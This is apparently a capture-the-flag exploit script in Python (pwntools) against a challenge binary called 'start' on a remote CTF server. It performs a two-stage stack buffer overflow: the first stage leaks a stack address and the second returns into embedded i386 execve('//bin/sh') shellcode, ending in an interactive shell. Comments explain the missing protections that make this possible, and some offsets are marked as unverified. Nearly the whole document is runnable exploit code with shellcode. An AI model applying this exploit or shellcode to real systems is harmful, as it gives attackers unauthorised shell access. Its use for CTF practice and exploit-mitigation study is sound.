from pwn import *
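# CTF exercise: two-stage stack overflow against the "start" challenge binary.
#
# Stage 1 overwrites the saved return address so that the program sends back
# four bytes, which this script treats as a stack address. Stage 2 overflows
# again and returns into bytes it has just placed on the stack.
#
# What this demonstrates, from the defender's side: the technique only works
# if the input read has no length bound, there is no stack canary in front of
# the return address, and the stack is executable. A non-executable stack (NX)
# or a bounded read is enough to break it.
# NOTE(review): the protections actually set on ./start are not visible from
# this script; confirm them with `checksec`.

# Padding length and return target are taken as-is from the original script.
PAD_LEN = 20
# Address inside ./start (the binary is not shown here). Judging by the 4-byte
# read that follows, returning here makes the program write stack contents
# back to the client. TODO: confirm against the disassembly.
LEAK_RETURN_ADDR = 0x08048087

local_elf = ELF("./start")
context.arch = local_elf.arch  # so asm() assembles for the binary's architecture

# Swap in the local process (optionally under gdb) to debug without the remote.
#p = process("./start")
p = remote("node3.buuoj.cn", 28802)
#gdb.attach(p, 'b* 0x08048060')

# Hand-written i386 Linux execve("//bin/sh", NULL, NULL).
# The assembled instruction string is identical to the original one-liner.
#shellcode=asm(shellcraft.sh())
shellcode = asm(
    "xor ecx,ecx;"        # ecx (argv) = NULL
    "xor edx,edx;"        # edx (envp) = NULL
    "push edx;"           # NUL terminator for the path string
    "push 0x68732f6e;"    # "n/sh" (little-endian)
    "push 0x69622f2f;"    # "//bi" -> "//bin/sh" now sits at esp
    "mov ebx,esp;"        # ebx = pointer to the path
    "mov al,0xb;"         # syscall 11 = execve; only the low byte of eax is
                          # written, the upper bytes keep their previous value
    "int 0x80"
)

# Stage 1: leak. Bytes literals are used throughout because p32() returns
# bytes; the original 'a'*20 + p32(...) raises TypeError on Python 3.
payload = b'a' * PAD_LEN + p32(LEAK_RETURN_ADDR)
p.recvuntil(b"Let's start the CTF:")
p.send(payload)
esp_addr = u32(p.recv(4))  # first four bytes sent back, read as a 32-bit LE address
p.recv()                   # discard whatever else was sent with the leak

# Stage 2: return into the shellcode that follows the overwritten address.
# The +20 offset from the leaked value is taken from the original script;
# presumably it is where the shellcode ends up relative to the leak.
# TODO: confirm in a debugger.
payload = b'a' * PAD_LEN + p32(esp_addr + 20) + shellcode
p.send(payload)
p.interactive()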